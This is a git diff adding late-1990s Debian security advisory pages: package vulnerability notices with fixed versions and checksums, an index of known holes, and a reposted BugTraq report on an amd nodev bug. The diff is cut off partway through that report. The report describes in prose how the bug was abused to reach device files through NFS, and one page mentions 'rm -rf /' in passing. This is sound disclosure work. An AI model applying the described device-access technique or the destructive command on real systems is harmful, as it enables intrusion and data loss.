+<P> +<DT>Affected packages: bind 4.9 prior to 4.9.7-1 and bind 8 prior to 8.1.2-1 +<P> +<DT>Brief description: + <DD> Older versions of bind are vulnerable to a buffer overrun during an inverse query request, potentially allowing system access as root. Additional vulnerabilities permit denial of service attacks on the bind service. +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in: + <DD>bind 4.9.7-2 in Debian GNU/Linux 1.3.1 alias bo +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/bo-updates/bind_4.9.7-2.dsc + <DD><SMALL>(MD5 checksum: e8414fc30c7f9439051a8afffd7c43f)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/bind_4.9.7-2.diff.gz + <DD><SMALL>(MD5 checksum: e2553787cab0b08da2947ed8d42201d3)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo-updates/bind_4.9.7.orig.tar.gz + <DD><SMALL>(MD5 checksum: a8a5e3ddef2be0c27c65b92f6cd9a53e)</SMALL><P> + + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian/bo-updates/bind_4.9.7-2_i386.deb + <DD><SMALL>(MD5 checksum: 08084183427d9259f34fd0460a610f01)</SMALL> +<P> +<DD>These files will be moved to ftp://ftp.debian.org/debian/bo/source/ and ftp://ftp.debian.org/debian/bo/binary-i386/ later. +<P> +<DT>Fixed in: + <DD>bind 1:8.1.2-1 in Debian GNU/Linux pre2.0 alias hamm +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2-1.diff.gz + <DD><SMALL>(MD5 checksum: 5f50024f6661dc7ed5dadf83d964b58e)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2-1.dsc + <DD><SMALL>(MD5 checksum: 67efab5f2e4f7ae57db945d926bdbb5d)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2.orig.tar.gz + <DD><SMALL>(MD5 checksum: 42e47e9a1002754ac19fc15a0c6bb061)</SMALL> +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/net/bind_8.1.2-1.deb + <DD><SMALL>MD5 checksum: 6e1116555fb6c421eb75c27717998708</SMALL> +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/net/bind_8.1.2-1.deb + <DD><SMALL>MD5 checksum: 692593d6bfb4a3c73627d49eac1e478b</SMALL> +<P> Sparc architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-sparc/net/bind_8.1.1-7.deb + <DD><SMALL>MD5 checksum: d5d665d8b6bf1009eb1b23ef3c1bf736</SMALL> +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-alpha/net/bind_8.1.2-1.deb + <DD><SMALL>MD5 checksum: 05dade39b728576e805096ae440d3938</SMALL> +<P> PowerPC architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-powerpc/net/bind_8.1.2-1.deb + <DD><SMALL>MD5 checksum: c8ea22885efe55381b70002a4678c607</SMALL> +<P> +<DT>Entered Distribution: April 19, 1998 +<DT>For more information: CERT advisory CA-98.05 +</DL> + +<P><SMALL>Last Modified: May 11, 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/bliss.html b/english/security/bliss.html new file mode 100644 index 00000000000..2b6984c4883 --- /dev/null +++ b/english/security/bliss.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Brief description: + <DD>bliss virus +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT>, but easy to disinfect with the + --bliss-uninfect-files-please argument to an infected program. +<DT>For more information: + <DD> Try the BugTraq archives. +</DL> +<STRONG>Note:</STRONG> The infection must be done as root. Of course root can do anything +(including 'rm -rf /') so most people don't see this as a problem. This is why people +should do as little as possible under root. + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/deliver.html b/english/security/deliver.html new file mode 100644 index 00000000000..5c07c13f38b --- /dev/null +++ b/english/security/deliver.html @@ -0,0 +1,40 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>10 Jan 1998 +<DT>Affected packages: + <DD>deliver +<DT>Brief description: + <DD>Buffer overflow can allow root access. deliver is not used on Debian by + default so most users won't be affected. +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>deliver 2.1.13, available in bo-updates +<DT>Entered Distribution: + <DD>11 Jan 1998 +<!-- +<DT>For more information: + <DD> +--> +</DL> + +<P><SMALL>Last Modified: 15 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/doom.html b/english/security/doom.html new file mode 100644 index 00000000000..315998eb27d --- /dev/null +++ b/english/security/doom.html @@ -0,0 +1,31 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Brief description: + <DD>doom startmouse creates replaceable /tmp/gpmscript +<DT>Vulnerable: + <DD>No. Debian had no doom package when this was reported. Any future Debian package + will not be vulnerable. +<DT>For more information: + <DD><a href="info/doom.html">Alan Cox</a> +</DL> + +<P><SMALL>Last Modified: 15 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/dwww.html b/english/security/dwww.html new file mode 100644 index 00000000000..87843234c4a --- /dev/null +++ b/english/security/dwww.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>11 Feb 1998 +<DT>Affected packages: + <DD>dwww +<DT>Brief description: + <DD>Shell meta-characters permitted +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>dwww 1.4.3-1 in hamm, 1.4.2-1 in bo-updates +<DT>Entered Distribution: + <DD> +</DL> + +<P><SMALL>Last Modified: April 29, 1998 +Copyright ©1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/elm-me+.html b/english/security/elm-me+.html new file mode 100644 index 00000000000..fac501e3cca --- /dev/null +++ b/english/security/elm-me+.html @@ -0,0 +1,36 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Affected package: + <DD>elm-me+ +<DT>Brief description: + <DD>Vulnerability in elm +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>elm-me+ 2.4pl25ME+31-5 +<DT>Date entered distribution: + <DD>July 2, 1997 +<DT>For more information: + <DD><A HREF="info/elm-me+.html">Notice</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/gcc.html b/english/security/gcc.html new file mode 100644 index 00000000000..cc5f1375831 --- /dev/null +++ b/english/security/gcc.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>17 Mar 1998 +<DT>Affected packages: + <DD>gcc in bo, bo-updates, hamm +<DT>Brief description: + <DD>vulnerable to symlink attack +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>Fix currently in testing. +<DT>Entered Distribution: + <DD> +</DL> + +<P><SMALL>Last Modified: April 29, 1998 +Copyright ©1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/gzip.html b/english/security/gzip.html new file mode 100644 index 00000000000..be8b521260b --- /dev/null +++ b/english/security/gzip.html @@ -0,0 +1,35 @@ +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>17 Mar 1998 +<DT>Affected packages: + <DD>gzip +<DT>Brief description: + <DD>potential buffer overflow executable +<DT>Vulnerable: + <DD><FONT COLOR="#FF0000">Yes</FONT> +<DT>Fixed in: + <DD>1.2.4-23 (hamm) and soon in bo +<DT>Entered Distribution: + <DD> +</DL> + +<P><SMALL>Last Modified: 27 Mar 1998 +Copyright ©1998 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/gzip2.html b/english/security/gzip2.html new file mode 100644 index 00000000000..203e31b847e --- /dev/null +++ b/english/security/gzip2.html @@ -0,0 +1,82 @@ +/<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: 14 May, 1998 +<P> +<DT>Affected packages: gzip prior to those listed below +<P> +<DT>Brief description: + <DD>We were told by Michal Zalewski that gzexe as shipped with gzip uses +an unsecure method decompressing executables on the fly opening a way +of calling arbitrary programs. Newer versions for bo and hamm are +fixing this. We recommend you upgrade your gzip package if you're +using the gzexe method. +<P> +<DT>Vulnerable: <FONT COLOR="#FF0000">Yes</FONT> +<P> +<DT>Fixed in:Debian GNU/Linux 1.3.1 alias bo + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/bo/source/base/gzip_1.2.4-26.1.diff.gz + <DD><SMALL>(MD5 checksum: d2954d118da06e4a0dc5f92890dc9fcc)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo/source/base/gzip_1.2.4-26.1.dsc + <DD><SMALL>(MD5 checksum: 223bfd632a6d39334f50db5b5f5c0119)</SMALL> + <DD>ftp://ftp.debian.org/debian/bo/source/base/gzip_1.2.4.orig.tar.gz + <DD><SMALL>(MD5 checksum: b94b3e07797e0cbf3622bb2fe5682f0b)</SMALL> +<P> + <DD>Intel architecture: + <DD>ftp://ftp.debian.org/debian/bo/binary-i386/base/gzip_1.2.4-26.1.deb + <DD><SMALL>(MD5 checksum: 1f7cb9c0f4c4377cc762e2a00575274d)</SMALL> +<P> +<DT>Fixed in: Debian GNU/Linux pre2.0 alias hamm + <DD> +<HR> + <DD>Source archives: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/gzip_1.2.4-27.diff.gz + <DD><SMALL>(MD5 checksum: 01e579067ea2555fcaf80c87e4cb837c)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/gzip_1.2.4-27.dsc + <DD><SMALL>(MD5 checksum: d944c76a8994d60c91ae7a59f0e4419c)</SMALL> + <DD>ftp://ftp.debian.org/debian/hamm/hamm/source/base/gzip_1.2.4.orig.tar.gz + <DD><SMALL>(MD5 checksum: b94b3e07797e0cbf3622bb2fe5682f0b)</SMALL> + +<P> Intel architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-i386/base/gzip_1.2.4-27.deb + <DD><SMALL>(MD5 checksum: c172997abdc49c215358613016a9568a)</SMALL> + +<P> Motorola 68k architecture: + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-m68k/base/gzip_1.2.4-27.deb + <DD><SMALL>(MD5 checksum: ed7203870b6f7358f9bf1d3427ca5138)</SMALL> + +<P> Sparc architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-sparc/base/gzip_1.2.4-27.deb + <DD><SMALL>(MD5 checksum: 3183f4805ef2ed38009cf0ce3df4441d)</SMALL> + +<P> Alpha architecture + <DD>ftp://ftp.debian.org/debian/hamm/hamm/binary-alpha/base/gzip_1.2.4-27.deb + <DD><SMALL>(MD5 checksum: 450cdf045e782ec563ac20ecf96da191)</SMALL> + +<P> PowerPC architecture + <DD>This architecture is considered experemental. No fixed gzip package can be provided. Use at your own risk. +<P> +<DT>Entered Distribution: +</DL> + +<P><SMALL>Last Modified: May 16, 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/imap4.html b/english/security/imap4.html new file mode 100644 index 00000000000..b2042ed3681 --- /dev/null +++ b/english/security/imap4.html @@ -0,0 +1,34 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>March 2, 1997 +<DT>Affected packages: + <DD>imap4 +<DT>Brief description: + <DD>The imapd, pop2d and pop3d servers allow remote, unauthenticated root access. +<DT>Vulnerable: + <DD>No. +<DT>For more information: + <DD> <a href="info/imapd.html">BugTraq</a> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/index.wml b/english/security/index.wml new file mode 100644 index 00000000000..7b6417d4972 --- /dev/null +++ b/english/security/index.wml @@ -0,0 +1,160 @@ +#!wml -o ../../../debian.org/security/%BASE.html.en +#use wml::debian::template title="Debian GNU/Linux — Security Information" + +<H1>Security Information</H1> + +Debian takes security very seriously. Most security problems brought +to our attention are corrected within 48 hours. + +<P>Experience has shown that "security through obscurity" does not work. Public disclosure allows for +more rapid and better solutions to security problems. In that vein, this page addresses +Debian's status with respect to various known +security holes, which could potentially affect Debian. They are shown +roughly in reverse chronological order. +<P> +For the latest Debian security information, please check the <A HREF="http://www.debian.org/Lists-Archives/debian-security-announce-9805/index.html">debian-security-announce</A> mailing list archives. + +<P> Please send security-related bug reports to <A HREF="mailto:security@debian.org">security@debian.org</A><P> + +<DL> +<DT><A HREF="mailx.html">mailx uses insecure method to write to /tmp files</A> + <DD>Fixed in several versions, please see linked page + +<DT><A HREF="premail.html">premail prior to 0.45-4 uses insecure method to open /tmp files</A> + <DD>Package provides fix for Debian 1.3.1 and pre 2.0 + +<DT><A HREF="kdebase.html">kde(base) shadow group vulnerable to buffer overrun, config saved as root</A> + <DD>Fixed in several versions, please see linked page + +<DT><A HREF="samba2.html">samba prior to 1.9.18p7 vulnerable to buffer overrun exploits</A> + <DD>Fixed in several versions, please see linked page + +<DT><A HREF="gzip2.html">gzip uses insecure method for on-the-fly decompression</A> + <DD>Fixed in 1.2.4-26 in bo (stable), 1.2.4-27 in hamm (unstable) + +<DT><A HREF="shadow-su.html">shadow-su has miscellaneous problems</A> + <DD>Fixed in several versions, please see linked page + +<DT><A HREF="procps.html">procps has file creation/corruption bug in XConsole</A> + <DD>Fixed in procps 1.2.7 or later + +<DT><A HREF="irc.html">irc potentially permits remote sending of characters to local terminal</A> + <DD>Fixed in several versions, please see linked page + +<DT><A HREF="super.html">super allows display of files without permissions</A> + <DD>Fixed in super 3.11.6 or later. + +<DT><A HREF="gcc.html">gcc vulnerable to a symlink attack</A> + <DD>Fix currently in testing. +<DT><A HREF="lincity.html">lincity buffer overflow vulnerability (prior to version 1.09-3)</A> + <DD>Click on above link for user fix. +<DT><A HREF="bind.html">bind 4.9 and 8 vulnerable to denial of service and buffer over-run</A> + <DD>Fixed in bind 1:8.1.2-1 in hamm, 4.9.7-2 in bo-updates +<DT><A HREF="perl.html">perl vulnerable to a symlink attack</A> + <DD>Fixed in perl 5.004.04-5 in hamm, soon in bo +<DT><A HREF="gzip.html">gzip buffer overflow possibly executable</A> + <DD>Fixed in gzip 1.2.4-23 in hamm, soon in bo +<DT><A HREF="netstd.html">routed (netstd package) potentially permits remote file overwrite</A> + <DD>Fixed in netstd 3.02-1 in hamm, 2.16-3 in bo-updates +<DT><A HREF="textutils.html">sort and tac utilities permit symlink attack</A> + <DD>Fixed in textutils 1.22-2.3 in bo, 1.22-2.4 in hamm +<DT><A HREF="dwww.html">dwww permits script meta-characters</A> + <DD>Fixed in dwww 1.4.3-1 in hamm, 1.4.2-1 in bo-updates +<DT><A HREF="sudo.html">Bug in sudo allowed users to run any root command</A> + <DD>Fixed in sudo 1.5.4-1.1 in bo, 1.5.4-2 in hamm +<DT><A HREF="mc.html">Script problem with mc</A> + <DD>Fixed in mc 4.1.22-1bo1 in bo and mc 4.1.22-1 in hamm +<DT><A HREF="sudo.html">Bug in sudo allowed users to run any root command</A> + <DD>Fixed in sudo 1.5.4-1.1 in bo and 1.5.4-2 in hamm +<DT><A HREF="smail.html">UUCP exploit under smail</A> + <DD>Fixed in smail 3.2.0.92-3, available in bo-updates. +<DT><A HREF="deliver.html">Buffer overflow in deliver</A> + <DD>Fixed in deliver 2.1.13, available in bo-updates. +<DT><A HREF="ldso.html">Buffer overflow in ldso</A> + <DD>Fixed in ldso 1.8.11 or later +<DT><A HREF="xfree2.html">Xserver can read arbitrary files</A> + <DD>Fixed in XF86_* 3.3.1-6 or later. +<DT><A HREF="land.html">Land attack, spoofed SYN packets</A> + <DD>Linux is not vulnerable +<DT><A HREF="samba.html">Samba gives remote user root access</A> + <DD>Fixed in samba 1.9.17p2 or later +<DT><A HREF="xfree.html">Problem with bad permissions on control socket for X</A> + <DD>Debian is not vulnerable +<DT><A HREF="teardrop.html">IP defragmenting can crash the kernel</A> + <DD>Fixed in Linux Kernel 2.0.32 or later +<DT><A HREF="mgetty.html">Bad quoting of user data in mgetty allowed root access</A> + <DD>Fixed in mgetty 1.1.8, available in bo-updates +<DT><A HREF="modutils.html">Problems with request-route</A> + <DD>Fixed in modutils 2.1.34-5a, available in bo-updates +<DT><A HREF="ssh.html">ssh allowed users to forward privileged ports</A> + <DD>Fixed in ssh 1.2.21, available in bo at nonus.debian.org +<DT><A HREF="svgalib.html">svgalib didn't properly give up root privileges</A> + <DD>Fixed in svgalib 1.2.10-5, available in bo-updates +<DT><A HREF="lynx.html">Anonymous lynx users can execute arbitrary commands</A> + <DD>Fixed in lynx 2.7.1-3, available in bo-updates +<DT><A HREF="libdb.html">libdb includes snprintf function without bound checking</A> + <DD>Fixed in libdb 1.85.4-4, available in bo-updates +<DT><A HREF="xfree1.html">Vulnerability in XFree86</A> + <DD>Fixed in xfree86 3.3, available in bo-updates +<DT><A HREF="elm-me+.html">Unauthorized access to mailboxes with elm</A> + <DD>Fixed in elm-me+ 2.4pl25ME+31-5, available in bo-updates +<DT><A HREF="sperl2.html">Buffer overflow in sperl 5.003</A> + <DD>Fixed in perl 5.003.07-10, available in rex-updates +<DT><A HREF="php.html">Vulnerability in PHP/FI</A> + <DD>Fixed in php 2.0b10-4, available in unstable +<DT><A HREF="metamail.html">Metamail is able to execute arbitrary commands</A> + <DD>Debian's metamail is safe +<DT><A HREF="amd.html">Amd ignores nodev option</A> + <DD>Fixed in amd upl102-11, available in rex-fixed +<DT><A HREF="inetd.html">Inetd passes privileged groups on to subprocesses</A> + <DD>Fixed in netbase 2.11-1 +<DT><A HREF="tftp.html">Tftpd allows retrieval of arbitrary files</A> + <DD>Debian ist not vulnerable +<DT><A HREF="sendmail.html">sendmail follows hardlinks when writing tmpfile</A> + <DD>Fixed? +<DT><A HREF="superprobe.html">SuperProbe contains buffer overflows</A> + <DD>SuperProbe is not setuid in Debian +<DT><A HREF="imap4.html">The imapd, pop2d and pop3d servers allow remote, unauthenticated root access</A> + <DD>Fixed in imap-4 4-3 +<DT><A HREF="screen.html">Screen overflows when copying the gcos field</A> + <DD>Debian is not vulnerable +<DT><A HREF="parsecontrol.html">INN parsecontrol has problems</A> + <DD>Debian is not vulnerable +<DT><A HREF="nlspath.html">NLSPATH buffer overflow</A> + <DD>Debian is not vulnerable +<DT><A HREF="minicom.html">Standard buffer overrun(s) in minicom</A> + <DD>Debian is not vulnerable +<DT><A HREF="doom.html">doom startmouse creates replaceable /tmp/gpmscript</A> + <DD>Debian had no doom package when this was reported. Any future package will not be + vulnerable +<DT><A HREF="xfree3.html">User X startup scripts may create exploitable files</A> + <DD>Debian is not vulnerable +<DT><A HREF="rlogin.html">rlogin doesn't check $TERM's length</A> + <DD>Fixed in rex-updates +<DT><A HREF="bliss.html">Bliss virus</A> + <DD>Debian is vulnerable only if you are root +<DT><A HREF="tar.html">GNU tar sometimes unintentionally creates setuid-root executables</A> + <DD>Fixed in rex-updates +<DT><A HREF="talkd.html">Talkd does not check hostname length</A> + <DD>Fixed in rex-updates +</DL> + +<STRONG>Note:</STRONG> Debian gives nicknames to each new release we are working on. +When a new version is ready, it is only then assigned a number. The current release +is the one pointed at by 'dists/stable' on the ftp archive. The development release is +the one pointed at by 'dists/unstable' on the ftp archive. +The nicknames are as follows: +<UL> +<LI>buzz - Debian 1.1 +<LI>rex - Debian 1.2 +<LI>bo - Debian 1.3 (current) +<LI>hamm - development release for 2.0 +<LI>slink - development release for 2.1 +</UL> +Also, there is an update directory for the current stable release. Security bugs are only +tracked until they make it into a stable update directory. If you find that the version +number in the stable release is higher than the one shown on this page fixing the bug, +then use the newer version. +<hr> + +<:= languages ("$(HOME)", "intro", "$(WML_SRC_BASENAME)", "$(CUR_LANG)") :> diff --git a/english/security/inetd.html b/english/security/inetd.html new file mode 100644 index 00000000000..64001a2b748 --- /dev/null +++ b/english/security/inetd.html @@ -0,0 +1,36 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<DL> +<DT>Date reported: + <DD>March 25, 1997 +<DT>Affected packages: + <DD>netbase +<DT>Brief description: + <DD>inetd passes priviledged groups on to subprocesses +<DT>Vulnerable: + <DD>Yes +<DT>Fixed in: + <DD>netbase 2.11-1 +<DT>For more information: + <DD><A HREF="info/inetd-groups.html">BugTraq</A> +</DL> + +<P><SMALL>Last Modified: 10 Jan 1998. +Copyright ©1997 SPI; See +<A HREF="../license.html">license terms.</A></SMALL> +<HR> +</BODY> +</HTML> diff --git a/english/security/info/amd-nodev.html b/english/security/info/amd-nodev.html new file mode 100644 index 00000000000..cc6d69706f9 --- /dev/null +++ b/english/security/info/amd-nodev.html @@ -0,0 +1,71 @@ + +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> +<HTML> +<HEAD> +<TITLE>Debian GNU/Linux - Security Information</TITLE> +<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> +<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> +</HEAD> + +<BODY BGCOLOR="#FFFFFF"> +<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Security Information</H1> +<HR> +Debian takes security very seriously. Most <a href="../index.html">security problems</a> brought +to our attention are corrected within 48 hours. + +<P> Please send security-related bug reports to <a href="mailto:security@debian.org">security@debian.org</a><P> + +<blockquote> +<b>Date: Mon, 7 Apr 1997 22:59:27 -0400 (EDT)</b> <br> +<b>From: Bradley M Keryan <keryan@andrew.cmu.edu></b> <p> + +amd from the amd-920824upl102-6.i386.rpm file distributed with RedHat +Linux 4.1 does not honor the nodev option for NFS filesystems and probably +other mount types, allowing any user access to the device files in /dev on +a system, provided that they have root access to another linux box on the +network. In addition, the default amd.conf from RH 4.1 maps /net/* to NFS +mounting, which makes the bug in amd an easily accessible security hole. <p> + +<b>The Exploit:</b> <p> + +A friend of mine who has an account on my machine found a major security +hole in amd when he decided to play a prank on me involving /dev/dsp at +odd hours, but found I had denied access to /dev/dsp and /dev/audio. He +assumed that I had forgotten to put the options nosuid and nodev in the +amd mapping for NFS (the default RedHat 4.1 mapping, which *does* have +opts=nosuid,nodev), so he created a char device on his machine with major +number 14 and minor 3, permissions 666, exported the directory it was in +via NFS, and logged into my machine. He used the /net/* amd mapping to +mount the directory, and then used the char device in the NFS-mounted +filesystem to play sounds, although /proc/mounts and /etc/mtab displayed +it as mounted nodev. <p> + +This exploit works for block and char devices. It could be used to do more +malicious acts than merely play sounds, such as scan /dev/mem for +passwords, change file permissions or the contents of /etc/shadow with a +raw disk editor, and sundry and various other bad things. <p> + +This bug may affect any other distributions that include amd, but both +the exploit and the bug have only been tested on RedHat 4.1. <p> + +<b>The Fix:</b> + +A <a href="amd-nodev.patch">one-character typo</a> in the linux-specific header file for amd prevents it +from actually passing the nodev option to the kernel. <p> + +That's it. Evidently M_NODEV was defined to something else elsewhere, +otherwise amd shouldn't have compiled. <p> + +Brad Keryan <br> +<a 